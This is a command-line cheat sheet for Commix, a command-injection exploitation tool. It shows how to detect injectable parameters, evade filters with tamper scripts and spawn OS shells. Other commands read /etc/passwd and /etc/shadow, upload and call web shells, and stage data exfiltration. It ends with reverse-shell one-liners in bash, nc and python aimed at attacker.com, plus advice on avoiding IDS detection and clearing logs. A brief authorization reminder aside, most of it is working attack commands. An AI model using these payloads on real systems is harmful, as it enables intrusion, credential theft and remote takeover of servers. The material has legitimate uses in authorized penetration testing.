Commix

Installation

Via Pip (Recommended)

pip install commix
commix --version

From Git Repository

git clone https://github.com/commixproject/commix.git
cd commix
python3 commix.py --version

Kali Linux

sudo apt-get update
sudo apt-get install commix
commix --version

Docker

docker pull commixproject/commix:latest
docker run -it commixproject/commix:latest commix --version

Basic Usage

Simple URL Scan

commix -u "http://target.com/page.php?id=1"
commix -u "http://target.com/page.php?id=1" --technique=c

Test Specific Parameter

commix -u "http://target.com/vulnerable.php?cmd=id" -p cmd
commix -u "http://target.com/page.php" -p "id,name,email"

List Detection Techniques

commix --technique=?

Injection Techniques

Classic (Results-Based) Injection

# Direct output visible in response
commix -u "http://target.com/page.php?id=1" --technique=c
commix -u "http://target.com/page.php?id=1" -c "whoami"

# Payload structure: id=1 ; whoami

Eval-Based Injection

# Server-side code evaluation
commix -u "http://target.com/page.php?id=1" --technique=e
commix -u "http://target.com/page.php?id=1" --technique=e -c "id"

# Common in PHP eval(), Python exec()

Time-Based Blind Injection

# No output, detection via time delays
commix -u "http://target.com/page.php?id=1" --technique=t
commix -u "http://target.com/page.php?id=1" --technique=t --time-sec=5

# Payload: id=1 ; sleep(5) ; id

File-Based Blind Injection

# Write to accessible file, then retrieve
commix -u "http://target.com/page.php?id=1" --technique=f
commix -u "http://target.com/page.php?id=1" --technique=f --file-write="/var/www/html/shell.php"

POST Data and Body Injection

POST Parameter Testing

commix -u "http://target.com/login.php" --data="username=admin&password=test"
commix -u "http://target.com/api.php" --data="cmd=ls" -p cmd

JSON Body Injection

commix -u "http://target.com/api/search" \
  --data='{"query":"test","filter":"1"}' -p filter

Form Data Multipart

commix -u "http://target.com/upload.php" \
  --data="file=test.txt&name=admin" -p name

Cookie Injection

Test Cookie Parameters

# Scan all cookies
commix -u "http://target.com/page.php" --cookie="session=abc123;role=user"

# Target specific cookie
commix -u "http://target.com/page.php" \
  --cookie="session=abc123;role=user" -p role

Cookie Manipulation

commix -u "http://target.com/page.php" \
  --cookie="id=1; path=/; domain=target.com" --technique=t

Header Injection

User-Agent Injection

commix -u "http://target.com/page.php?id=1" \
  --user-agent="Mozilla/5.0 (Commix Test)"

Custom Header Injection

commix -u "http://target.com/page.php" \
  --headers="X-Forwarded-For: 127.0.0.1" -p "X-Forwarded-For"

commix -u "http://target.com/api.php" \
  --headers="Authorization: Bearer token123" -p "Authorization"

Referer and Origin Headers

commix -u "http://target.com/page.php?id=1" \
  --referer="http://attacker.com"

Authentication

Basic Authentication

commix -u "http://target.com/admin/page.php?id=1" \
  --auth-type=basic --auth-cred="username:password"

Digest Authentication

commix -u "http://target.com/secure/page.php?id=1" \
  --auth-type=digest --auth-cred="admin:secretpass"

Bearer Token

commix -u "http://target.com/api/search.php" \
  --headers="Authorization: Bearer eyJhbGciOiJIUzI1NiJ9..."

Proxy and Network Configuration

Burp Suite Proxy

commix -u "http://target.com/page.php?id=1" \
  --proxy="http://127.0.0.1:8080"

Socks Proxy

commix -u "http://target.com/page.php?id=1" \
  --proxy="socks5://127.0.0.1:9050"

Custom Proxy Authentication

commix -u "http://target.com/page.php?id=1" \
  --proxy="http://user:pass@proxy.com:8080"

Disable SSL Verification

commix -u "https://target.com/page.php?id=1" --ssl-verify=false

Interactive Shell Access

Pseudo-Terminal Shell

commix -u "http://target.com/page.php?id=1" --os-shell
# Execute commands interactively
whoami
id
cat /etc/passwd

Full Shell vs Limited Shell

# Attempts to spawn full shell
commix -u "http://target.com/page.php?id=1" --os-shell --shell-type=bash

# Falls back to command-by-command execution

Exit Shell Session

exit
quit

File Operations

Read Remote Files

commix -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
commix -u "http://target.com/page.php?id=1" --file-read="/etc/shadow"
commix -u "http://target.com/page.php?id=1" --file-read="/var/www/html/config.php"

Write Files to Remote Server

# Write payload/shell to accessible directory
commix -u "http://target.com/page.php?id=1" \
  --file-write="/path/to/local/shell.php" \
  --file-dest="/var/www/html/uploads/shell.php"

Execute Uploaded Shell

# After file-write, access the uploaded file
curl http://target.com/uploads/shell.php?cmd=id

Custom Tamper Scripts

Create Custom Tamper Script

# Location: ~/.commix/tamper/custom_tamper.py
vim ~/.commix/tamper/custom_tamper.py

Example Tamper Script

# ~/.commix/tamper/base64encode.py
def tamper(payload):
    import base64
    return base64.b64encode(payload.encode()).decode()

Apply Tamper Script

commix -u "http://target.com/page.php?id=1" \
  --tamper="base64encode"

# Multiple tampers
commix -u "http://target.com/page.php?id=1" \
  --tamper="base64encode,urlencoding"

Built-in Tamper Scripts

# View available tamper modules
commix --tamper-list

# Common tampers: space2plus, space2tab, comment, encoding

Filter Evasion and Encoding

Space Alternative Separators

commix -u "http://target.com/page.php?id=1" \
  --tamper="space2plus" -c "whoami"

commix -u "http://target.com/page.php?id=1" \
  --tamper="space2tab" -c "whoami"

Command Substitution

# Backticks: `whoami`
# Dollar syntax: $(whoami)
# Command substitution handled automatically by commix

URL Encoding Payloads

commix -u "http://target.com/page.php?id=1" \
  --tamper="urlencoding" -c "cat /etc/passwd"

Semicolon and Pipe Alternatives

# Standard: id ; whoami
# AND operator: id && whoami
# OR operator: id || whoami
# Pipe: id | base64

Character Encoding Bypass

commix -u "http://target.com/page.php?id=1" \
  --tamper="hexencode" -c "ls -la"

commix -u "http://target.com/page.php?id=1" \
  --tamper="base64encode" -c "whoami"

Common Vulnerable Parameters

Query String Parameters

# Common vulnerable parameters
commix -u "http://target.com/ping.php?ip=127.0.0.1" -p ip
commix -u "http://target.com/lookup.php?domain=example.com" -p domain
commix -u "http://target.com/convert.php?url=file:///etc/passwd" -p url

Search and Filter Parameters

commix -u "http://target.com/search.php?q=test&sort=id" -p "q,sort"
commix -u "http://target.com/filter.php?category=admin&type=user" -p "category,type"

Upload and File Parameters

commix -u "http://target.com/process.php?file=upload.txt"
commix -u "http://target.com/convert.php?input=file.pdf"

Burp Suite Integration

Manual Request in Burp

# 1. Capture request in Burp Proxy
# 2. Copy to clipboard or save to file
# 3. Use Commix with request file

commix -r burp_request.txt

Burp Collaborator Integration

# Use Burp Collaborator for blind injection detection
commix -u "http://target.com/page.php?id=1" \
  --technique=t \
  --time-sec=10

Export Results

commix -u "http://target.com/page.php?id=1" \
  --batch \
  --output-dir="./results/"

Advanced Options

Batch Mode (Non-Interactive)

commix -u "http://target.com/page.php?id=1" --batch
commix -u "http://target.com/page.php?id=1" --batch -c "id"

Force Specific Technique

# Skip detection, force specific technique
commix -u "http://target.com/page.php?id=1" --technique=c --force

Verbosity and Logging

# Verbose output
commix -u "http://target.com/page.php?id=1" -v

# Very verbose
commix -u "http://target.com/page.php?id=1" -vv

# Save output to file
commix -u "http://target.com/page.php?id=1" --output-dir="./logs/"

Crawling and Scope

# Crawl website for parameters
commix -u "http://target.com/" --crawl=2

# Specify threads
commix -u "http://target.com/page.php?id=1" --threads=10

Custom Delay and Timeouts

# Add delay between requests
commix -u "http://target.com/page.php?id=1" --delay=2

# Set timeout for responses
commix -u "http://target.com/page.php?id=1" --timeout=30

# Time-based blind injection delay
commix -u "http://target.com/page.php?id=1" --technique=t --time-sec=10

Workflow Examples

Full Assessment

# 1. Test all parameters with auto detection
commix -u "http://target.com/page.php?id=1&name=test" --batch

# 2. Identify injection point and technique
# (Commix outputs results)

# 3. Gain interactive shell
commix -u "http://target.com/page.php?id=1" --os-shell

# 4. Read sensitive files
commix -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"

Blind Injection Exploitation

# 1. Detect with time-based
commix -u "http://target.com/blind.php?id=1" --technique=t

# 2. Verify vulnerability
commix -u "http://target.com/blind.php?id=1" --technique=t -c "whoami"

# 3. Exfiltrate data via file-write or OOB channel
commix -u "http://target.com/blind.php?id=1" \
  --file-write="exfil.php" --file-dest="/var/www/html/"

Evading WAF/IPS

# 1. Test multiple tamper techniques
commix -u "http://target.com/page.php?id=1" \
  --tamper="space2plus,comment" --technique=t

# 2. Adjust timing
commix -u "http://target.com/page.php?id=1" --delay=5 --timeout=60

# 3. Use encoding
commix -u "http://target.com/page.php?id=1" --tamper="hexencode"

Common Payloads and Tests

Information Gathering

whoami          # Current user
id              # User and group IDs
pwd             # Current directory
uname -a        # System information
cat /etc/os-release  # OS details

File System Enumeration

ls -la          # List with hidden files
cat /etc/passwd # User enumeration
find / -type f -name "*.php" 2>/dev/null  # Find PHP files

Reverse Shell Patterns

bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc attacker.com 4444 -e /bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.Popen(["/bin/sh","-i"]);p.wait()'

Troubleshooting

No Vulnerability Detected

# Verify parameter is vulnerable manually
# Test with manual payload first
# Try different techniques: --technique=c,e,t,f

# Check if filtering is in place
commix -u "http://target.com/page.php?id=1" --tamper="space2plus"

False Positives

# Use --force to skip detection
commix -u "http://target.com/page.php?id=1" --force -c "id"

# Test with known working payload
commix -u "http://target.com/page.php?id=1" -c "whoami" --technique=c

Timeout Issues

# Increase timeout
commix -u "http://target.com/page.php?id=1" --timeout=60

# Reduce threads
commix -u "http://target.com/page.php?id=1" --threads=1

Proxy Errors

# Verify proxy is running
# Check proxy authentication
commix -u "http://target.com/page.php?id=1" \
  --proxy="http://user:pass@proxy:8080" -v

Tips and Best Practices

1. Always get authorization before testing on any system
2. Test locally first with intentionally vulnerable apps (DVWA, WebGoat)
3. Use Burp Suite to capture real requests and refine parameters
4. Start with simple payloads before complex encoding/tamper scripts
5. Document findings with screenshots and proof-of-concept commands
6. Respect scope and only test authorized parameters
7. Use time delays carefully to avoid IDS/IPS detection on time-based blinds
8. Clean up after testing - remove uploaded shells and clear logs